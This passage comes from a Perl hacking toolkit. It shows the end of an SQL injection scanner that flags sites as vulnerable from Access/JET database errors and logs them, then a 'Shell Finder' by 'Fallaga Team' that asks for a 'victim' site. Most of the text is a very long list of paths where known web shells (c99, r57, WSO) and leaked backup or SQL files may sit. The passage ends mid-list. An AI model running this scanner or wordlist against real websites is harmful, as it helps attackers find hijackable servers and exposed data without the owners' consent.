      # Matches Microsoft JET / Access ODBC driver errors, although the
      # message printed below says "MsSQL".
      elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
      {
        push @z, $link;
        print "[+] MsSQL Vulnerable: $link\n\n";
      }

      else {

            print "[-] $link <- Not Vulnerable\n\n";
      }
}

}
    print "Vulnerable Links:\n";
    print "-----------------------------------\n";
# @z is never cleared, so links from earlier runs in the same session are
# listed again.
foreach (@z)
{
    print "$_ \n\n";
}
print "Save Into A Text File? (Y or N): ";
chomp ($save = <STDIN>);

# Only an upper-case "Y" saves.
if ($save eq 'Y')
{
    print "Saving File...\n\n";
    # Bareword handle, append mode; the result of open() is not checked.
    open(vuln_file, ">>Vulns.txt");
    foreach (@z)
    {
        print vuln_file "$_ \n";
    }
    close(vuln_file);
    print "File Saved!\n\n";
}
# Leaves the sub by jumping to the MainMenu label in the enclosing block.
goto MainMenu;
# The second brace on the next line closes the bare block opened after the
# title call, not just this sub.
}}
  3035. }
  3036. if($targett eq '1')
  3037. {
  3038. system('cls');
  3039. system('title Dir Finder');
  3040.                    {
  3041.                        print " Shell Finder \n";
  3042. use HTTP::Request;
  3043. use LWP::UserAgent;
  3044.  
  3045. system('cls');
  3046. system('title Dir Finder Rec0ded by Fallag crx');
  3047. print"\n";
  3048. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
  3049. print "\t>                              Shell Finder                        >\n";
  3050. print "\t>                          C0ded by Fallag crx                        >\n";
  3051. print "\t>                           Fallaga Team                          >\n";
  3052. print "\t>                          Result In Done.txt                       >\n";
  3053. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
  3054. print "\n";
  3055.  
  3056. print " Scan Your site Site\n\n Example: www.victim.com \n\n-> ";
  3057.  
  3058.  
  3059. $site=<STDIN>;
  3060. chomp $site;
  3061.  
  3062. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  3063.  
  3064. print "\n";
  3065.  
  3066. @path =  ('WSO.php','dz.php','w.php','wp-content/plugins/akismet/akismet.php','images/stories/w.php','w.php','shell.php','cpanel.php','cpn.php','sql.php','mysql.php','config. ​ php','configuration.php','madspot.php','Cgishell.pl','killer.php','changeall.php ​ ','2.php','Sh3ll.php','dz0.php','dam.php','user.php','dom.php','whmcs.php','r00t ​ .php','1.php','a.php','r0k.php','abc.php','egy.php','syrian_shell.php','xxx.php' &#8203; ,'settings.php','tmp.php','cyber.php','c99.php','r57.php','404.php','gaza.php',' ​ 1.php','d4rk.php','index1.php','nkr.php','xd.php','M4r0c.php','Dz.php','sniper.p ​ hp','ksa.php','v4team.php','offline.php','priv8.php','911.php','madspotshell.php ​ ','c100.php','sym.php','cp.php','tmp/cpn.php','tmp/w.php','tmp/r57.php','tmp/king.php','tmp/sok.php','tmp/ss.php','tmp/as.php','tmp/dz.php','tmp/r1z.php','tmp/whmcs.php','tmp/root.php','tmp/r00t.php','templates/beez/index.php','templates/beez/beez.php','templates/rhuk_milkyway/index.php','tmp/uploads.php','tmp/upload.php','tmp/sa.php','sa.php','readme.php','tmp/readme.php','wp.zip'.'wp-content/plugins/disqus-comment-system/disqus.php',
  3067. 'd0mains.php','wp-content/plugins/akismet/akismet.php','madspotshell.php','info.php','egyshell.php','Sym.php','c22.php','c ​100.php',
  3068. 'wp-content/plugins/akismet/admin.php#','configuration.php','g.php','wp-content/plugins/google-sitemap-generator/sitemap-core.php#',
  3069. 'wp-content/plugins/akismet/widget.php#','xx.pl','ls.php','Cpanel.php','k.php','zone-h.php','tmp/user.php','tmp/Sym.php','cp.php',
  3070. 'tmp/madspotshell.php','tmp/root.php','tmp/whmcs.php','tmp/index.php','tmp/2.php','tmp/dz.php','tmp/cpn.php',
  3071. 'tmp/changeall.php','tmp/Cgishell.pl','tmp/sql.php','0day.php','tmp/admin.php','cliente/downloads/h4xor.php',
  3072. 'whmcs/downloads/dz.php','L3b.php','d.php','tmp/d.php','tmp/L3b.php','wp-content/plugins/akismet/admin.php',
  3073. 'templates/rhuk_milkyway/index.php','templates/beez/index.php','sado.php','admin1.php','upload.php','up.php','vb.zip','vb.rar',
  3074. 'admin2.asp','uploads.php','sa.php','sysadmins/','admin1/','sniper.php','administration/Sym.php','images/Sym.php',
  3075. '/r57.php','/wp-content/plugins/disqus-comment-system/disqus.php','gzaa_spysl','sql-new.php','/shell.php','/sa.php','/admin.php',
  3076. '/sa2.php','/2.php','/gaza.php','/up.php','/upload.php','/uploads.php','/templates/beez/index.php','shell.php','/amad.php',
  3077. '/t00.php','/dz.php','/site.rar','/Black.php','/site.tar.gz','/home.zip','/home.rar','/home.tar','/home.tar.gz',
  3078. '/forum.zip','/forum.rar','/forum.tar','/forum.tar.gz','/test.txt','/ftp.txt','/user.txt','/site.txt','/error_log','/error',
  3079. '/cpanel','/awstats','/site.sql','/vb.sql','/forum.sql','r00t-s3c.php','c.php','/backup.sql','/back.sql','/data.sql','wp.rar/',
  3080. 'wp-content/plugins/disqus-comment-system/disqus.php','asp.aspx','/templates/beez/index.php','tmp/vaga.php',
  3081. 'tmp/killer.php','whmcs.php','abuhlail.php','tmp/killer.php','tmp/domaine.pl','tmp/domaine.php','useradmin/',
  3082. 'tmp/d0maine.php','d0maine.php','tmp/sql.php','X.php','123.php','m.php','b.php','up.php','tmp/dz1.php','dz1.php','forum.zip','Symlink.php','Symlink.pl',
  3083. 'forum.rar','joomla.zip','joomla.rar','wp.php','buck.sql','sysadmin.php','images​/c99.php', 'xd.php', 'c100.php',
  3084. 'spy.aspx','xd.php','tmp/xd.php','sym/root/home/','billing/killer.php','tmp/upload.php','tmp/admin.php',
  3085. 'Server.php','tmp/uploads.php','tmp/up.php','Server/','wp-admin/c99.php','tmp/priv8.php','priv8.php','cgi.pl/',
  3086. 'tmp/cgi.pl','downloads/dom.php','templates/ja-helio-farsi/index.php','webadmin.html','admins.php',
  3087. '/wp-content/plugins/count-per-day/js/yc/d00.php','bluff.php','king.jeen','admins/','admins.asp','admins.php','wp.zip','/wp-content/plugins/disqus-comment-system/WSO.php',
  3088. '/wp-content/plugins/disqus-comment-system/dz.php',
  3089. '/wp-content/plugins/disqus-comment-system/DZ.php',
  3090. '/wp-content/plugins/disqus-comment-system/cpanel.php',
  3091. '/wp-content/plugins/disqus-comment-system/cpn.php',
  3092. '/wp-content/plugins/disqus-comment-system/sos.php',
  3093. '/wp-content/plugins/disqus-comment-system/term.php',
  3094. '/wp-content/plugins/disqus-comment-system/Sec-War.php',
  3095. '/wp-content/plugins/disqus-comment-system/sql.php',
  3096. '/wp-content/plugins/disqus-comment-system/ssl.php',
  3097. '/wp-content/plugins/disqus-comment-system/mysql.php',
  3098. '/wp-content/plugins/disqus-comment-system/WolF.php',
  3099. '/wp-content/plugins/disqus-comment-system/madspot.php',
  3100. '/wp-content/plugins/disqus-comment-system/Cgishell.pl',
  3101. '/wp-content/plugins/disqus-comment-system/killer.php',
  3102. '/wp-content/plugins/disqus-comment-system/changeall.php',
  3103. '/wp-content/plugins/disqus-comment-system/2.php',
  3104. '/wp-content/plugins/disqus-comment-system/Sh3ll.php',
  3105. '/wp-content/plugins/disqus-comment-system/dz0.php',
  3106. '/wp-content/plugins/disqus-comment-system/dam.php',
  3107. '/wp-content/plugins/disqus-comment-system/user.php',
  3108. '/wp-content/plugins/disqus-comment-system/dom.php',
  3109. '/wp-content/plugins/disqus-comment-system/whmcs.php',
  3110. '/wp-content/plugins/disqus-comment-system/vb.zip',
  3111. '/wp-content/plugins/disqus-comment-system/r00t.php',
  3112. '/wp-content/plugins/disqus-comment-system/c99.php',
  3113. '/wp-content/plugins/disqus-comment-system/gaza.php',
  3114. '/wp-content/plugins/disqus-comment-system/1.php',
  3115. '/wp-content/plugins/disqus-comment-system/d0mains.php',
  3116. '/wp-content/plugins/disqus-comment-system/madspotshell.php',
  3117. '/wp-content/plugins/disqus-comment-system/info.php',
  3118. '/wp-content/plugins/disqus-comment-system/egyshell.php',
  3119. '/wp-content/plugins/disqus-comment-system/Sym.php',
  3120. '/wp-content/plugins/disqus-comment-system/c22.php',
  3121. '/wp-content/plugins/disqus-comment-system/c100.php',
  3122. '/wp-content/plugins/disqus-comment-system/configuration.php',
  3123. '/wp-content/plugins/disqus-comment-system/g.php',
  3124. '/wp-content/plugins/disqus-comment-system/xx.pl',
  3125. '/wp-content/plugins/disqus-comment-system/ls.php',
  3126. '/wp-content/plugins/disqus-comment-system/Cpanel.php',
  3127. '/wp-content/plugins/disqus-comment-system/k.php',
  3128. '/wp-content/plugins/disqus-comment-system/zone-h.php',
  3129. '/wp-content/plugins/disqus-comment-system/tmp/user.php',
  3130. '/wp-content/plugins/disqus-comment-system/tmp/Sym.php',
  3131. '/wp-content/plugins/disqus-comment-system/cp.php',
  3132. '/wp-content/plugins/disqus-comment-system/tmp/madspotshell.php',
  3133. '/wp-content/plugins/disqus-comment-system/tmp/root.php',
  3134. '/wp-content/plugins/disqus-comment-system/tmp/whmcs.php',
  3135. '/wp-content/plugins/disqus-comment-system/tmp/index.php',
  3136. '/wp-content/plugins/disqus-comment-system/tmp/2.php',
  3137. '/wp-content/plugins/disqus-comment-system/tmp/dz.php',
  3138. '/wp-content/plugins/disqus-comment-system/tmp/cpn.php',
  3139. '/wp-content/plugins/disqus-comment-system/tmp/changeall.php',
  3140. '/wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl',
  3141. '/wp-content/plugins/disqus-comment-system/tmp/sql.php',
  3142. '/wp-content/plugins/disqus-comment-system/0day.php',
  3143. '/wp-content/plugins/disqus-comment-system/tmp/admin.php',
  3144. '/wp-content/plugins/disqus-comment-system/L3b.php',
  3145. '/wp-content/plugins/disqus-comment-system/d.php',
  3146. '/wp-content/plugins/disqus-comment-system/tmp/d.php',
  3147. '/wp-content/plugins/disqus-comment-system/tmp/L3b.php',
  3148. '/wp-content/plugins/disqus-comment-system/sado.php',
  3149. '/wp-content/plugins/disqus-comment-system/admin1.php',
  3150. '/wp-content/plugins/disqus-comment-system/upload.php',
  3151. '/wp-content/plugins/disqus-comment-system/up.php',
  3152. '/wp-content/plugins/disqus-comment-system/vb.zip',
  3153. '/wp-content/plugins/disqus-comment-system/vb.rar',
  3154. '/wp-content/plugins/disqus-comment-system/admin2.asp',
  3155. '/wp-content/plugins/disqus-comment-system/uploads.php',
  3156. '/wp-content/plugins/disqus-comment-system/sa.php',
  3157. '/wp-content/plugins/disqus-comment-system/sysadmins/',
  3158. '/wp-content/plugins/disqus-comment-system/admin1/',
  3159. '/wp-content/plugins/disqus-comment-system/sniper.php',
  3160. '/wp-content/plugins/disqus-comment-system/images/Sym.php',
  3161. '/wp-content/plugins/disqus-comment-system//r57.php',
  3162. '/wp-content/plugins/disqus-comment-system/gzaa_spysl',
  3163. '/wp-content/plugins/disqus-comment-system/sql-new.php',
  3164. '/wp-content/plugins/disqus-comment-system//shell.php',
  3165. '/wp-content/plugins/disqus-comment-system//sa.php',
  3166. '/wp-content/plugins/disqus-comment-system//admin.php',
  3167. '/wp-content/plugins/disqus-comment-system//sa2.php',
  3168. '/wp-content/plugins/disqus-comment-system//2.php',
  3169. '/wp-content/plugins/disqus-comment-system//gaza.php',
  3170. '/wp-content/plugins/disqus-comment-system//up.php',
  3171. '/wp-content/plugins/disqus-comment-system//upload.php',
  3172. '/wp-content/plugins/disqus-comment-system//uploads.php',
  3173. '/wp-content/plugins/disqus-comment-system/shell.php',
  3174. '/wp-content/plugins/disqus-comment-system//amad.php',
  3175. '/wp-content/plugins/disqus-comment-system//t00.php',
  3176. 'pwp-content/plugins/disqus-comment-system/disqus.php',
  3177. 'wp-content/plugins/akismet/WSO.php',
  3178. 'wp-content/plugins/akismet/dz.php',
  3179. 'wp-content/plugins/akismet/DZ.php',
  3180. 'wp-content/plugins/akismet/cpanel.php',
  3181. 'wp-content/plugins/akismet/cpn.php',
  3182. 'wp-content/plugins/akismet/sos.php',
  3183. 'wp-content/plugins/akismet/term.php',
  3184. 'wp-content/plugins/akismet/Sec-War.php',
  3185. 'wp-content/plugins/akismet/sql.php',
  3186. 'wp-content/plugins/akismet/ssl.php',
  3187. 'wp-content/plugins/akismet/mysql.php',
  3188. 'wp-content/plugins/akismet/WolF.php',
  3189. 'wp-content/plugins/akismet/madspot.php',
  3190. 'wp-content/plugins/akismet/Cgishell.pl',
  3191. 'wp-content/plugins/akismet/killer.php',
  3192. 'wp-content/plugins/akismet/changeall.php',
  3193. 'wp-content/plugins/akismet/2.php',
  3194. 'wp-content/plugins/akismet/Sh3ll.php',
  3195. 'wp-content/plugins/akismet/dz0.php',
  3196. 'wp-content/plugins/akismet/dam.php',
  3197. 'wp-content/plugins/akismet/user.php',
  3198. 'wp-content/plugins/akismet/dom.php',
  3199. 'wp-content/plugins/akismet/whmcs.php',
  3200. 'wp-content/plugins/akismet/vb.zip',
  3201. 'wp-content/plugins/akismet/r00t.php',
  3202. 'wp-content/plugins/akismet/c99.php',
  3203. 'wp-content/plugins/akismet/gaza.php',
  3204. 'wp-content/plugins/akismet/1.php',
  3205. 'wp-content/plugins/akismet/d0mains.php',
  3206. 'wp-content/plugins/akismet/madspotshell.php',
  3207. 'wp-content/plugins/akismet/info.php',
  3208. 'wp-content/plugins/akismet/egyshell.php',
  3209. 'wp-content/plugins/akismet/Sym.php',
  3210. 'wp-content/plugins/akismet/c22.php',
  3211. 'wp-content/plugins/akismet/c100.php',
  3212. 'wp-content/plugins/akismet/configuration.php',
  3213. 'wp-content/plugins/akismet/g.php',
  3214. 'wp-content/plugins/akismet/xx.pl',
  3215. 'wp-content/plugins/akismet/ls.php',
  3216. 'wp-content/plugins/akismet/Cpanel.php',
  3217. 'wp-content/plugins/akismet/k.php',
  3218. 'wp-content/plugins/akismet/zone-h.php',
  3219. 'wp-content/plugins/akismet/tmp/user.php',
  3220. 'wp-content/plugins/akismet/tmp/Sym.php',
  3221. 'wp-content/plugins/akismet/cp.php',
  3222. 'wp-content/plugins/akismet/tmp/madspotshell.php',
  3223. 'wp-content/plugins/akismet/tmp/root.php',
  3224. 'wp-content/plugins/akismet/tmp/whmcs.php',
  3225. 'wp-content/plugins/akismet/tmp/index.php',
  3226. 'wp-content/plugins/akismet/tmp/2.php',
  3227. 'wp-content/plugins/akismet/tmp/dz.php',
  3228. 'wp-content/plugins/akismet/tmp/cpn.php',
  3229. 'wp-content/plugins/akismet/tmp/changeall.php',
  3230. 'wp-content/plugins/akismet/tmp/Cgishell.pl',
  3231. 'wp-content/plugins/akismet/tmp/sql.php',
  3232. 'wp-content/plugins/akismet/0day.php',
  3233. 'wp-content/plugins/akismet/tmp/admin.php',
  3234. 'wp-content/plugins/akismet/L3b.php',
  3235. 'wp-content/plugins/akismet/d.php',
  3236. 'wp-content/plugins/akismet/tmp/d.php',
  3237. 'wp-content/plugins/akismet/tmp/L3b.php',
  3238. 'wp-content/plugins/akismet/sado.php',
  3239. 'wp-content/plugins/akismet/admin1.php',
  3240. 'wp-content/plugins/akismet/upload.php',
  3241. 'wp-content/plugins/akismet/up.php',
  3242. 'wp-content/plugins/akismet/vb.zip',
  3243. 'wp-content/plugins/akismet/vb.rar',
  3244. 'wp-content/plugins/akismet/admin2.asp',
  3245. 'wp-content/plugins/akismet/uploads.php',
  3246. 'wp-content/plugins/akismet/sa.php',
  3247. 'wp-content/plugins/akismet/sysadmins/',
  3248. 'wp-content/plugins/akismet/admin1/',
  3249. 'wp-content/plugins/akismet/sniper.php',
  3250. 'wp-content/plugins/akismet/images/Sym.php',
  3251. 'wp-content/plugins/akismet//r57.php',
  3252. 'wp-content/plugins/akismet/gzaa_spysl',
  3253. 'wp-content/plugins/akismet/sql-new.php',
  3254. 'wp-content/plugins/akismet//shell.php',
  3255. 'wp-content/plugins/akismet//sa.php',
  3256. 'wp-content/plugins/akismet//admin.php',
  3257. 'wp-content/plugins/akismet//sa2.php',
  3258. 'wp-content/plugins/akismet//2.php',
  3259. 'wp-content/plugins/akismet//gaza.php',
  3260. 'wp-content/plugins/akismet//up.php',
  3261. 'wp-content/plugins/akismet//upload.php',
  3262. 'wp-content/plugins/akismet//uploads.php',
  3263. 'wp-content/plugins/akismet/shell.php',
  3264. 'wp-content/plugins/akismet//amad.php',
  3265. 'wp-content/plugins/akismet//t00.php',
  3266. 'wp-content/plugins/akismet//dz.php',
  3267. 'wp-content/plugins/akismet//site.rar',
  3268. 'wp-content/plugins/akismet//Black.php',
  3269. 'wp-content/plugins/akismet//site.tar.gz',
  3270. 'wp-content/plugins/akismet//home.zip',
  3271. 'wp-content/plugins/akismet//home.rar',
  3272. 'wp-content/plugins/akismet//home.tar',
  3273. 'wp-content/plugins/akismet//home.tar.gz',
  3274. 'wp-content/plugins/akismet//forum.zip',
  3275. 'wp-content/plugins/akismet//forum.rar',
  3276. 'wp-content/plugins/akismet//forum.tar',
  3277. 'wp-content/plugins/akismet//forum.tar.gz',
  3278. 'wp-content/plugins/akismet//test.txt',
  3279. 'wp-content/plugins/akismet//ftp.txt',
  3280. 'wp-content/plugins/akismet//user.txt',
  3281. 'wp-content/plugins/akismet//site.txt',
  3282. 'wp-content/plugins/akismet//error_log',
  3283. 'wp-content/plugins/akismet//error',
  3284. 'wp-content/plugins/akismet//cpanel',
  3285. 'wp-content/plugins/akismet//awstats',
  3286. 'wp-content/plugins/akismet//site.sql',
  3287. 'wp-content/plugins/akismet//vb.sql',
  3288. 'wp-content/plugins/akismet//forum.sql',
  3289. 'wp-content/plugins/akismet/r00t-s3c.php',
  3290. 'wp-content/plugins/akismet/c.php',
  3291. 'wp-content/plugins/akismet//backup.sql',
  3292. 'wp-content/plugins/akismet//back.sql',
  3293. 'wp-content/plugins/akismet//data.sql',
  3294. 'wp-content/plugins/akismet/wp.rar/',
  3295. 'wp-content/plugins/akismet/asp.aspx',
  3296. 'wp-content/plugins/akismet/tmp/vaga.php',
  3297. 'wp-content/plugins/akismet/tmp/killer.php',
  3298. 'wp-content/plugins/akismet/whmcs.php',
  3299. 'wp-content/plugins/akismet/abuhlail.php',
  3300. 'wp-content/plugins/akismet/tmp/killer.php',
  3301. 'wp-content/plugins/akismet/tmp/domaine.pl',
  3302. 'wp-content/plugins/akismet/tmp/domaine.php',
  3303. 'wp-content/plugins/akismet/useradmin/',
  3304. 'wp-content/plugins/akismet/tmp/d0maine.php',
  3305. 'wp-content/plugins/akismet/d0maine.php',
  3306. 'wp-content/plugins/akismet/tmp/sql.php',
  3307. 'wp-content/plugins/akismet/X.php',
  3308. 'wp-content/plugins/akismet/123.php',
  3309. 'wp-content/plugins/akismet/m.php',
  3310. 'wp-content/plugins/akismet/b.php',
  3311. 'wp-content/plugins/akismet/up.php',
  3312. 'wp-content/plugins/akismet/tmp/dz1.php',
  3313. 'wp-content/plugins/akismet/dz1.php',
  3314. 'wp-content/plugins/akismet/forum.zip',
  3315. 'wp-content/plugins/akismet/Symlink.php',
  3316. 'wp-content/plugins/akismet/Symlink.pl',
  3317. 'wp-content/plugins/akismet/forum.rar',
  3318. 'wp-content/plugins/akismet/joomla.zip',
  3319. 'wp-content/plugins/akismet/joomla.rar',
  3320. 'wp-content/plugins/akismet/wp.php',
  3321. 'wp-content/plugins/akismet/buck.sql',
  3322. 'wp-content/plugins/akismet/sysadmin.php',
  3323. 'wp-content/plugins/akismet/images/c99.php',
  3324. 'wp-content/plugins/akismet/xd.php',
  3325. 'wp-content/plugins/akismet/c100.php',
  3326. 'wp-content/plugins/akismet/spy.aspx',
  3327. 'wp-content/plugins/akismet/xd.php',
  3328. 'wp-content/plugins/akismet/tmp/xd.php',
  3329. 'wp-content/plugins/akismet/sym/root/home/',
  3330. 'wp-content/plugins/akismet/billing/killer.php',
  3331. 'wp-content/plugins/akismet/tmp/upload.php',
  3332. 'wp-content/plugins/akismet/tmp/admin.php',
  3333. 'wp-content/plugins/akismet/Server.php',
  3334. 'wp-content/plugins/akismet/tmp/uploads.php',
  3335. 'wp-content/plugins/akismet/tmp/up.php',
  3336. 'wp-content/plugins/akismet/Server/',
  3337. 'wp-content/plugins/akismet/wp-admin/c99.php',
  3338. 'wp-content/plugins/akismet/tmp/priv8.php',
  3339. 'wp-content/plugins/akismet/priv8.php',
  3340. 'wp-content/plugins/akismet/cgi.pl/',
  3341. 'wp-content/plugins/akismet/tmp/cgi.pl',
  3342. 'wp-content/plugins/akismet/downloads/dom.php',
  3343. 'wp-content/plugins/akismet/webadmin.html',
  3344. 'wp-content/plugins/akismet/admins.php',
  3345. 'wp-content/plugins/akismet/bluff.php',
  3346. 'wp-content/plugins/akismet/king.jeen',
  3347. 'wp-content/plugins/akismet/admins/',
  3348. 'wp-content/plugins/akismet/admins.asp',
  3349. 'wp-content/plugins/akismet/admins.php',
  3350. 'wp-content/plugins/akismet/wp.zip',
  3351. 'wp-content/plugins/akismet/disqus.php',
  3352. 'wp-content/plugins/google-sitemap-generator//cpanel',
  3353. 'wp-content/plugins/google-sitemap-generator//awstats',
  3354. 'wp-content/plugins/google-sitemap-generator//site.sql',
  3355. 'wp-content/plugins/google-sitemap-generator//vb.sql',
  3356. 'wp-content/plugins/google-sitemap-generator//forum.sql',
  3357. 'wp-content/plugins/google-sitemap-generator/r00t-s3c.php',
  3358. 'wp-content/plugins/google-sitemap-generator/c.php',
  3359. 'wp-content/plugins/google-sitemap-generator//backup.sql',
  3360. 'wp-content/plugins/google-sitemap-generator//back.sql',
  3361. 'wp-content/plugins/google-sitemap-generator//data.sql',
  3362. 'wp-content/plugins/google-sitemap-generator/wp.rar/',
  3363. 'wp-content/plugins/google-sitemap-generator/asp.aspx',
  3364. 'wp-content/plugins/google-sitemap-generator/tmp/vaga.php',
  3365. 'wp-content/plugins/google-sitemap-generator/tmp/killer.php',
  3366. 'wp-content/plugins/google-sitemap-generator/whmcs.php',
  3367. 'wp-content/plugins/google-sitemap-generator/abuhlail.php',
  3368. 'wp-content/plugins/google-sitemap-generator/tmp/killer.php',
  3369. 'wp-content/plugins/google-sitemap-generator/tmp/domaine.pl',
  3370. 'wp-content/plugins/google-sitemap-generator/tmp/domaine.php',
  3371. 'wp-content/plugins/google-sitemap-generator/useradmin/',
  3372. 'wp-content/plugins/google-sitemap-generator/tmp/d0maine.php',
  3373. 'wp-content/plugins/google-sitemap-generator/d0maine.php',
  3374. 'wp-content/plugins/google-sitemap-generator/tmp/sql.php',
  3375. 'wp-content/plugins/google-sitemap-generator/X.php',
  3376. 'wp-content/plugins/google-sitemap-generator/123.php',
  3377. 'wp-content/plugins/google-sitemap-generator/m.php',
  3378. 'wp-content/plugins/google-sitemap-generator/b.php',
  3379. 'wp-content/plugins/google-sitemap-generator/up.php',
  3380. 'wp-content/plugins/google-sitemap-generator/tmp/dz1.php',
  3381. 'wp-content/plugins/google-sitemap-generator/dz1.php',
  3382. 'wp-content/plugins/google-sitemap-generator/forum.zip',
  3383. 'wp-content/plugins/google-sitemap-generator/Symlink.php',
  3384. 'wp-content/plugins/google-sitemap-generator/Symlink.pl',
  3385. 'wp-content/plugins/google-sitemap-generator/forum.rar',
  3386. 'wp-content/plugins/google-sitemap-generator/joomla.zip',
  3387. 'wp-content/plugins/google-sitemap-generator/joomla.rar',
  3388. 'wp-content/plugins/google-sitemap-generator/wp.php',
  3389. 'wp-content/plugins/google-sitemap-generator/buck.sql',
  3390. 'wp-content/plugins/google-sitemap-generator/sysadmin.php',
  3391. 'wp-content/plugins/google-sitemap-generator/images/c99.php',
  3392. 'wp-content/plugins/google-sitemap-generator/xd.php',
  3393. 'wp-content/plugins/google-sitemap-generator/c100.php',
  3394. 'wp-content/plugins/google-sitemap-generator/spy.aspx',
  3395. 'wp-content/plugins/google-sitemap-generator/xd.php',
  3396. 'wp-content/plugins/google-sitemap-generator/tmp/xd.php',
  3397. 'wp-content/plugins/google-sitemap-generator/sym/root/home/',
  3398. 'wp-content/plugins/google-sitemap-generator/billing/killer.php',
  3399. 'wp-content/plugins/google-sitemap-generator/tmp/upload.php',
  3400. 'wp-content/plugins/google-sitemap-generator/tmp/admin.php',
  3401. 'wp-content/plugins/google-sitemap-generator/Server.php',
  3402. 'wp-content/plugins/google-sitemap-generator/tmp/uploads.php',
  3403. 'wp-content/plugins/google-sitemap-generator/tmp/up.php',
  3404. 'wp-content/plugins/google-sitemap-generator/Server/',
  3405. 'wp-content/plugins/google-sitemap-generator/wp-admin/c99.php',
  3406. 'wp-content/plugins/google-sitemap-generator/tmp/priv8.php',
  3407. 'wp-content/plugins/google-sitemap-generator/priv8.php',
  3408. 'wp-content/plugins/google-sitemap-generator/cgi.pl/',
  3409. 'wp-content/plugins/google-sitemap-generator/tmp/cgi.pl',
  3410. 'wp-content/plugins/google-sitemap-generator/downloads/dom.php',
  3411. 'wp-content/plugins/google-sitemap-generator/webadmin.html',
  3412. 'wp-content/plugins/google-sitemap-generator/admins.php',
  3413. 'wp-content/plugins/google-sitemap-generator/bluff.php',
  3414. 'wp-content/plugins/google-sitemap-generator/king.jeen',
  3415. 'wp-content/plugins/google-sitemap-generator/admins/',
  3416. 'wp-content/plugins/google-sitemap-generator/admins.asp',
  3417. 'wp-content/plugins/google-sitemap-generator/admins.php',
  3418. 'wp-content/plugins/google-sitemap-generator/wp.zip',
  3419. 'wp-content/plugins/google-sitemap-generator/sitemap-core.php',
  3420. '/templates/beez/WSO.php',
  3421. '/templates/beez/dz.php',
  3422. '/templates/beez/DZ.php',
  3423. '/templates/beez/cpanel.php',
  3424. '/templates/beez/cpn.php',
  3425. '/templates/beez/sos.php',
  3426. '/templates/beez/term.php',
  3427. '/templates/beez/Sec-War.php',
  3428. '/templates/beez/sql.php',
  3429. '/templates/beez/ssl.php',
  3430. '/templates/beez/mysql.php',
  3431. '/templates/beez/WolF.php',
  3432. '/templates/beez/madspot.php',
  3433. '/templates/beez/Cgishell.pl',
  3434. '/templates/beez/killer.php',
  3435. '/templates/beez/changeall.php',
  3436. '/templates/beez/2.php',
  3437. '/templates/beez/Sh3ll.php',
  3438. '/templates/beez/dz0.php',
  3439. '/templates/beez/dam.php',
  3440. '/templates/beez/user.php',
  3441. '/templates/beez/dom.php',
  3442. '/templates/beez/whmcs.php',
  3443. '/templates/beez/vb.zip',
  3444. '/templates/beez/r00t.php',
  3445. '/templates/beez/c99.php',
  3446. '/templates/beez/gaza.php',
  3447. '/templates/beez/1.php',
  3448. '/templates/beez/d0mains.php',
  3449. '/templates/beez/madspotshell.php',
  3450. '/templates/beez/info.php',
  3451. '/templates/beez/egyshell.php',
  3452. '/templates/beez/Sym.php',
  3453. '/templates/beez/c22.php',
  3454. '/templates/beez/c100.php',
  3455. '/templates/beez/configuration.php',
  3456. '/templates/beez/g.php',
  3457. '/templates/beez/xx.pl',
  3458. '/templates/beez/ls.php',
  3459. '/templates/beez/Cpanel.php',
  3460. '/templates/beez/k.php',
  3461. '/templates/beez/zone-h.php',
  3462. '/templates/beez/tmp/user.php',
  3463. '/templates/beez/tmp/Sym.php',
  3464. '/templates/beez/cp.php',
  3465. '/templates/beez/tmp/madspotshell.php',
  3466. '/templates/beez/tmp/root.php',
  3467. '/templates/beez/tmp/whmcs.php',
  3468. '/templates/beez/tmp/index.php',
  3469. '/templates/beez/tmp/2.php',
  3470. '/templates/beez/tmp/dz.php',
  3471. '/templates/beez/tmp/cpn.php',
  3472. '/templates/beez/tmp/changeall.php',
  3473. '/templates/beez/tmp/Cgishell.pl',
  3474. '/templates/beez/tmp/sql.php',
  3475. '/templates/beez/0day.php',
  3476. '/templates/beez/tmp/admin.php',
  3477. '/templates/beez/L3b.php',
  3478. '/templates/beez/d.php',
  3479. '/templates/beez/tmp/d.php',
  3480. '/templates/beez/tmp/L3b.php',
  3481. '/templates/beez/sado.php',
  3482. '/templates/beez/admin1.php',
  3483. '/templates/beez/upload.php',
  3484. '/templates/beez/up.php',
  3485. '/templates/beez/vb.zip',
  3486. '/templates/beez/vb.rar',
  3487. '/templates/beez/admin2.asp',
  3488. '/templates/beez/uploads.php',
  3489. '/templates/beez/sa.php',
  3490. '/templates/beez/sysadmins/',
  3491. '/templates/beez/admin1/',
  3492. '/templates/beez/sniper.php',
  3493. '/templates/beez/images/Sym.php',
  3494. '/templates/beez//r57.php',
  3495. '/templates/beez/gzaa_spysl',
  3496. '/templates/beez/sql-new.php',
  3497. '/templates/beez//shell.php',
  3498. '/templates/beez//sa.php',
  3499. '/templates/beez//admin.php',
  3500. '/templates/beez//sa2.php',
  3501. '/templates/beez//2.php',
  3502. '/templates/beez//gaza.php',
  3503. '/templates/beez//up.php',
  3504. '/templates/beez//upload.php',
  3505. '/templates/beez//uploads.php',
  3506. '/templates/beez/shell.php',
  3507. '/templates/beez//amad.php',
  3508. '/templates/beez//t00.php',
  3509. '/templates/beez//dz.php',
  3510. '/templates/beez//site.rar',
  3511. '/templates/beez//Black.php',
  3512. '/templates/beez//site.tar.gz',
  3513. '/templates/beez//home.zip',
  3514. '/templates/beez//home.rar',
  3515. '/templates/beez//home.tar',
  3516. '/templates/beez//home.tar.gz',
  3517. '/templates/beez//forum.zip',
  3518. '/templates/beez//forum.rar',
  3519. '/templates/beez//forum.tar',
  3520. '/templates/beez//forum.tar.gz',
  3521. '/templates/beez//test.txt',
  3522. '/templates/beez//ftp.txt',
  3523. '/templates/beez//user.txt',
  3524. '/templates/beez//site.txt',
  3525. '/templates/beez//error_log',
  3526. '/templates/beez//error',
  3527. '/templates/beez//cpanel',
  3528. '/templates/beez//awstats',
  3529. '/templates/beez//site.sql',
  3530. '/templates/beez//vb.sql',
  3531. '/templates/beez//forum.sql',
  3532. '/templates/beez/r00t-s3c.php',
  3533. '/templates/beez/c.php',
